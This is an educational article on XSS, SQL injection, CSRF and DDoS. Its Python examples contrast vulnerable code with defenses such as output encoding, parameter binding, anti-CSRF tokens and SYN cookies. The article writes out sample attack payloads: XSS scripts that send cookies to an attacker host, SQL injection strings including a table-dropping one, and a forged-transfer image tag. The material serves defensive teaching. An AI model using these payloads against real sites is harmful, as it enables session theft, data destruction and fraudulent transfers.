This article briefly introduces several common web attacks and how to defend against each of them.
• XSS (cross-site scripting attack)
• CSRF (cross-site request forgery)
• SQL injection
• DDoS

XSS

concept
• Short for Cross-Site Scripting: an attacker gets a script of their choosing into a page, and other users' browsers run it with that page's origin, so it can read the site's cookies and DOM and make requests as the victim.
case
• Suppose I run a blog. An attacker posts an article whose body is <script>window.open("http://www.gongji.com?param=" + document.cookie)</script>. If I store that text in the database as-is and later serve it unchanged to other readers, their browsers execute the script and send their cookies to the attacker's server. This is stored XSS: the script runs with my site's origin, so document.cookie is my site's cookies.
The cause of the attack
• User input was treated as code. The <script> above should have been plain text inside the page, but the browser parsed it as markup and executed it.
prevention
• Encode user-supplied data for the context it is rendered into. For HTML body text, HTML-encode it on output so < becomes &lt; and > becomes &gt;, and the browser displays the tag as text instead of parsing it. Do the encoding when the data is written into the page rather than when it is received: the same string may be rendered in HTML, inside an attribute, in JavaScript, or in a URL, and each context needs a different encoding. Two independent checks also blunt the example above: mark the session cookie HttpOnly so document.cookie cannot read it, and set a Content-Security-Policy that restricts which scripts may run.
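The stored-XSS case above, as an added example in Python (not code from the original article). It stores the attacker's text, renders it three ways, and shows why output encoding beats deleting <script> tags: the in-memory articles dict stands in for the database, and both payloads are constructed for the demo.

```python
import html
import re

# Constructed sample input: the attacker's article body from the example above,
# and a second payload that carries no <script> tag at all.
ATTACKER_POST = '<script>window.open("http://www.gongji.com?param=" + document.cookie)</script>'
IMG_PAYLOAD = '<img src=x onerror="fetch(\'http://www.gongji.com?param=\' + document.cookie)">'

articles = {}   # stand-in for the database table that holds article bodies


def save_article(article_id, body):
    """Store the submitted text unchanged; encoding is decided at output time."""
    articles[article_id] = body


def render_unsafe(article_id):
    """Vulnerable: the stored text is spliced into the response as HTML."""
    return '<div class="article">' + articles[article_id] + '</div>'


def render_blacklist(article_id):
    """Still vulnerable: deleting <script> tags misses every other vector."""
    body = re.sub(r'</?script[^>]*>', '', articles[article_id], flags=re.IGNORECASE)
    return '<div class="article">' + body + '</div>'


def render_safe(article_id):
    """Hardened: HTML-encode on output so the browser sees text, not markup."""
    return '<div class="article">' + html.escape(articles[article_id], quote=True) + '</div>'


def has_live_tag(page):
    """Check used below: is there still a raw <script> or <img> tag for the browser to parse?"""
    return re.search(r'<(script|img)\b', page, flags=re.IGNORECASE) is not None


if __name__ == "__main__":
    save_article(1, ATTACKER_POST)
    save_article(2, IMG_PAYLOAD)
    for aid in (1, 2):
        print(f"article {aid}: unsafe={has_live_tag(render_unsafe(aid))}"
              f" blacklist={has_live_tag(render_blacklist(aid))}"
              f" safe={has_live_tag(render_safe(aid))}")
```

The blacklist filter looks fine against the first payload and fails against the second, which is the general lesson: enumerate what is allowed (encode everything that is not) rather than what is forbidden.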

SQL injection

concept
• SQL fragments disguised as ordinary HTTP request parameters are sent to the server; the server splices them into a query and executes it, so the attacker controls what the database does.
Case
• ' or '1'='1 is the classic example. The login code builds select * from user where username='...' and password='...' by splicing the submitted values into the text. Enter the username jiajun and the password ' or '1'='1, and the executed statement becomes select * from user where username='jiajun' and password='' or '1'='1'. Since '1'='1' is always true, the WHERE clause matches and the password check is bypassed.
• Worse, with a password of ';drop table user;-- the statement becomes select * from user where username='jiajun' and password='';drop table user;--'. The -- comments out the trailing quote, and if the database driver accepts several statements in one call, the user table is deleted outright.
The cause of the attack
• Parameters are spliced into the SQL text, so attacker-controlled input changes the structure of the statement rather than just the values it compares against.
prevention
• In Java, use prepared statements (PreparedStatement) with bound parameters. The structure of the query is fixed before the values are supplied, so an input like ' or '1'='1 is compared as a literal string and cannot alter the statement. Database drivers in most other languages offer the same mechanism.
• Most ORM frameworks bind parameters for you, but the raw-query and string-formatting escape hatches in those same frameworks do not; review every place they are used.
• Plan for the worst: assume the database will one day be dumped. Never store passwords in plaintext. Store a per-user random salt together with the output of a deliberately slow password hash such as bcrypt, scrypt, Argon2 or PBKDF2 (so the row holds username, salt, hash). Plain MD5, even with a salt, is far too fast: it can be brute-forced offline at billions of guesses per second on a GPU.
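The injection case and the prevention list above, as one added example in Python (not code from the original article). It reproduces the spliced query and the ' or '1'='1 bypass, then shows the same login with bound parameters and with a salted PBKDF2 hash in place of the MD5 suggestion. An in-memory sqlite3 database stands in for the real one; the account, password and iteration count are constructed for the demo.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 200_000   # PBKDF2 work factor; assumed value, tune to your hardware budget


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256 (a slow hash); returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_db():
    """Constructed sample data: one account stored two ways.
    user_legacy keeps the plaintext password that the article's vulnerable query
    compares against; user keeps only a salt and a hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_legacy (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE user (username TEXT, salt BLOB, pw_hash BLOB)")
    conn.execute("INSERT INTO user_legacy VALUES ('jiajun', 'correct horse')")
    salt, digest = hash_password("correct horse")
    conn.execute("INSERT INTO user VALUES (?, ?, ?)", ("jiajun", salt, digest))
    return conn


def login_vulnerable(conn, username, password):
    """String splicing, as in the article: attacker text becomes part of the SQL."""
    sql = ("SELECT * FROM user_legacy WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same query, but the values travel as bound parameters, never as SQL text."""
    sql = "SELECT * FROM user_legacy WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def login_hardened(conn, username, password):
    """Parameterized lookup by username, then a constant-time check of the slow hash."""
    row = conn.execute("SELECT salt, pw_hash FROM user WHERE username=?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, expected = row
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)


PAYLOAD = "' or '1'='1"   # the article's bypass string, typed into the password field

if __name__ == "__main__":
    db = make_db()
    print("vulnerable    :", login_vulnerable(db, "jiajun", PAYLOAD))
    print("parameterized :", login_parameterized(db, "jiajun", PAYLOAD))
    print("hardened      :", login_hardened(db, "jiajun", PAYLOAD))
    print("hardened, real password:", login_hardened(db, "jiajun", "correct horse"))
```

Note that sqlite3's execute() refuses to run more than one statement per call, so the ';drop table user;-- payload raises an error here instead of dropping the table; many other drivers do run stacked statements, which is why the fix is parameter binding rather than relying on driver behaviour.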

CSRF

concept
• Short for Cross-Site Request Forgery: making a request under the identity of a trusted user. In plain terms, I log in to site A, so my browser holds A's cookie. I then visit a rogue site and, say, click a link there that points at A. The browser attaches A's cookie to that request automatically, so the rogue site has just acted on A as me.
case
• The example may not match a real bank, but the mechanism is the same. I am logged in to Bank A. I visit a rogue site my roommate sent me and click a link there to www.A.com/transfer?account=666&money=10000. My browser sends that request with my Bank A cookie attached, and 10,000 yuan goes to account 666.
• Note that no click is needed. Any resource the rogue page loads can point at the transfer URL, for example <img src="http://www.A.com/transfer?account=666&money=10000">: the browser fetches it, cookie included, as soon as the page renders.
The cause of the attack
• The browser stores the cookie and attaches it to every request to A, whichever site triggered the request. The server authenticates by cookie alone, so it cannot tell a forged request from a genuine one.
prevention
• The attack works because the cookie, which the browser sends automatically, is the only proof of identity. So require a second credential that the browser does not send automatically: a random per-session anti-CSRF token that the server embeds in its own forms (or that JavaScript on its own pages puts into a request header) and checks on every state-changing request. The rogue site cannot read that token, because the same-origin policy stops it from reading A's pages, so its forged requests fail the check. Two related checks: make state-changing operations POST rather than GET (an <img> tag can only issue GET), and set the SameSite attribute on the session cookie so the browser does not attach it to cross-site requests.
• Check the Referer (or, better, the Origin) header. HTTP Referer is a request header the browser sends with the URL of the page the request came from, so the server can insist that a transfer request originated from a page on Bank A's own site. Bear in mind that some browsers and privacy settings strip Referer, so the check must fail closed when the header is missing, and it should not be the only defense.
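The defenses above, as an added example in Python (not code from the original article): a transfer handler that refuses GET, checks Origin/Referer against the site's own origin, and requires a per-session token that only the bank's own page can embed. Requests are plain dicts, the sessions dict stands in for a session store, the https scheme for www.A.com and the rogue hostname are assumed, and all sample requests are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.A.com"   # Bank A's origin (scheme assumed for the demo)

sessions = {}   # session cookie value -> session data; stand-in for a server-side store


def login(user):
    """Create a session with a random per-session anti-CSRF token; return the cookie value."""
    sid = secrets.token_urlsafe(32)
    sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def transfer_form(sid):
    """The transfer page Bank A serves to its logged-in user. The token is embedded in
    the form; a rogue site cannot read this page cross-origin, so it never learns it."""
    token = sessions[sid]["csrf"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{token}">'
            '<input name="account"><input name="money"><button>Send</button></form>')


def from_our_own_pages(headers):
    """Origin first, then Referer. No header at all fails closed."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            u = urlsplit(value)
            return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN
    return False


def handle_transfer(request):
    """request = {"method", "cookies", "headers", "params"}; returns (status, message).
    The cookie alone never authorizes a state change."""
    session = sessions.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    if request["method"] != "POST":
        return 405, "transfers must be POST; an <img> or a link can only send GET"
    if not from_our_own_pages(request["headers"]):
        return 403, "request did not originate from our own pages"
    supplied = str(request["params"].get("csrf", "")).encode()
    if not hmac.compare_digest(supplied, session["csrf"].encode()):
        return 403, "missing or wrong anti-CSRF token"
    p = request["params"]
    return 200, f"{session['user']} transferred {p['money']} to account {p['account']}"


def request(method, sid, headers, **params):
    """Builds the constructed sample requests below. The browser adds the cookie
    whichever site triggered the request, which is exactly the CSRF problem."""
    return {"method": method, "cookies": {"session": sid}, "headers": headers, "params": params}


if __name__ == "__main__":
    sid = login("victim")
    token = sessions[sid]["csrf"]   # Bank A's own page put this into its form
    rogue = {"Referer": "https://rogue.example/page.html"}
    ours = {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/transfer"}
    # <img src="http://www.A.com/transfer?account=666&money=10000"> on the rogue page
    print(handle_transfer(request("GET", sid, rogue, account="666", money="10000")))
    # auto-submitted cross-site form: right method, wrong origin, no token
    print(handle_transfer(request("POST", sid, rogue, account="666", money="10000")))
    # the victim's own submission from Bank A's transfer page
    print(handle_transfer(request("POST", sid, ours, account="123", money="50", csrf=token)))
```

The token comparison uses hmac.compare_digest so that a wrong token is rejected in constant time. A SameSite=Lax or Strict session cookie would stop the forged requests one layer earlier, at the browser; the server-side checks remain necessary for browsers and clients that do not honour it.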

DDOS

concept
• Distributed Denial of Service: flooding a server with so many requests that it can no longer serve real users. DDoS builds on DoS: DoS is one attacker against one target, DDoS is many machines against one or more targets. A single machine's traffic is rarely enough against a modern server, so attackers use botnets of compromised devices across the public Internet to multiply it.
Case
• SYN flood. In the TCP three-way handshake, the client sends SYN to ask for a connection, the server replies SYN-ACK and records the half-open connection, and the client answers with ACK to complete it. An attacker sends SYNs with forged source IP addresses. The server allocates state for each one and sends the SYN-ACK to the forged address, where nobody answers, so the third step never happens; the server keeps the half-open entry and keeps retransmitting the SYN-ACK. With a large enough stream of forged SYNs, the half-open connection queue fills up, genuine SYNs are dropped, and the server stops accepting connections.
• CC (Challenge Collapsar) attack: an application-layer attack over HTTP that mimics normal users, sending large numbers of expensive requests (search, login, dynamic pages) until the site cannot keep up and refuses service.
The cause of the attack
• The server's resources are finite: bandwidth, but also connection state, CPU and application threads. A SYN flood exhausts the half-open queue, a CC attack exhausts application capacity, and a volumetric flood exhausts the link; in every case the attacker can generate load more cheaply than the server can absorb it.
prevention
• The most direct answer is more capacity (bandwidth, servers). It is an unequal fight: the attacker's bandwidth comes from compromised machines and costs almost nothing, while the server's bandwidth is expensive.
• Cloud providers and dedicated scrubbing services offer complete DDoS mitigation with far more absorbing capacity than a single deployment can buy. On the host itself, enable SYN cookies (net.ipv4.tcp_syncookies on Linux), which let the kernel answer SYNs without keeping half-open state, and put rate limiting in front of expensive application endpoints to blunt CC-style traffic.
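The SYN-cookie idea behind the host-side defense, as an added example in Python (not code from the original article or from any kernel). Instead of storing a half-open entry per SYN, the server encodes a keyed hash of the connection 4-tuple and a time slot into the ISN of its SYN-ACK; a genuine client echoes it back as ACK-1, so the server can verify the third packet with no stored state. The secret, the 64-second slot, the Listener class and the flood scenario are all constructed for the demo, and the cookie layout is simplified (real kernels also encode the MSS in it).

```python
import hashlib
import hmac

SECRET = b"constructed-demo-secret"   # assumption: a kernel uses a random per-boot key
WINDOW = 64                           # seconds per time slot; cookies from the current
                                      # and previous slot are accepted
MASK32 = 0xFFFFFFFF


def _mac(src_ip, src_port, dst_ip, dst_port, counter):
    """Keyed hash of the connection 4-tuple and the time slot, truncated to 24 bits."""
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, now):
    """Server ISN for the SYN-ACK: an 8-bit time slot and a 24-bit MAC, offset by the
    client's ISN. Nothing is stored; the client's ACK carries everything back."""
    counter = (now // WINDOW) & 0xFF
    value = (counter << 24) | _mac(src_ip, src_port, dst_ip, dst_port, counter)
    return (value + client_isn) & MASK32


def check_syn_cookie(src_ip, src_port, dst_ip, dst_port, seq, ack, now):
    """Validate the third handshake packet statelessly: seq-1 is the client's ISN and
    ack-1 is the cookie we sent, if we sent one."""
    value = ((ack - 1) - (seq - 1)) & MASK32
    counter, mac = value >> 24, value & 0xFFFFFF
    current = (now // WINDOW) & 0xFF
    if counter not in (current, (current - 1) & 0xFF):
        return False   # stale, or a guessed ISN with the wrong slot
    expected = _mac(src_ip, src_port, dst_ip, dst_port, counter)
    return hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big"))


class Listener:
    """A listening socket with a bounded half-open queue (the SYN backlog)."""

    def __init__(self, ip, port, backlog, syncookies):
        self.ip, self.port, self.backlog, self.syncookies = ip, port, backlog, syncookies
        self.half_open = {}      # (src_ip, src_port) -> ISN we sent; unused with cookies
        self.established = set()

    def on_syn(self, src_ip, src_port, client_isn, now):
        """Returns the ISN sent in the SYN-ACK, or None if the SYN had to be dropped."""
        if self.syncookies:
            return make_syn_cookie(src_ip, src_port, self.ip, self.port, client_isn, now)
        if len(self.half_open) >= self.backlog:
            return None          # queue full: a genuine client is dropped like the rest
        isn = _mac(src_ip, src_port, self.ip, self.port, now)   # any ISN will do here
        self.half_open[(src_ip, src_port)] = isn
        return isn

    def on_ack(self, src_ip, src_port, seq, ack, now):
        """Third handshake packet; True if the connection is now established."""
        if self.syncookies:
            ok = check_syn_cookie(src_ip, src_port, self.ip, self.port, seq, ack, now)
        else:
            ok = self.half_open.pop((src_ip, src_port), None) == ((ack - 1) & MASK32)
        if ok:
            self.established.add((src_ip, src_port))
        return ok


def flood_then_real_client(syncookies, spoofed=1000, backlog=128):
    """Constructed scenario: SYNs from forged addresses that never complete the handshake,
    followed by one genuine client. Returns whether the genuine client got connected."""
    srv = Listener("10.0.0.1", 80, backlog, syncookies)
    now = 1_000_000
    for i in range(spoofed):     # forged sources: the SYN-ACKs go nowhere, no ACK comes back
        srv.on_syn(f"198.51.100.{i % 254 + 1}", 1024 + i, client_isn=i, now=now)
    isn = srv.on_syn("192.0.2.7", 40000, client_isn=12345, now=now)
    if isn is None:
        return False
    return srv.on_ack("192.0.2.7", 40000, seq=12346, ack=(isn + 1) & MASK32, now=now + 1)


if __name__ == "__main__":
    print("without SYN cookies, real client connects:", flood_then_real_client(False))
    print("with SYN cookies, real client connects:   ", flood_then_real_client(True))
```

Without cookies the 128-entry backlog is full of forged entries when the real client arrives, and its SYN is dropped; with cookies the forged SYNs cost the server nothing but a SYN-ACK each, and the real client's ACK validates. The trade-off is that the server cannot remember TCP options it did not encode into the cookie, which is why production kernels only switch to cookies once the backlog is under pressure.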

Summary
• Four attacks were covered: XSS (the key is the script: malicious script runs in other users' browsers), CSRF (the key is the cookie: the browser attaches it to forged requests automatically), SQL injection (the key is the statement: parameters spliced into SQL become SQL), and DDoS (the key is volume: enough requests to exhaust the server).
• Each of these succeeds because the server trusts something it should not: raw user input, a cookie on its own, or the assumption that load will stay within limits. The user's behavior cannot be controlled, so the defenses have to live on the server side.
• Nothing is absolutely safe; the goal is to be safer.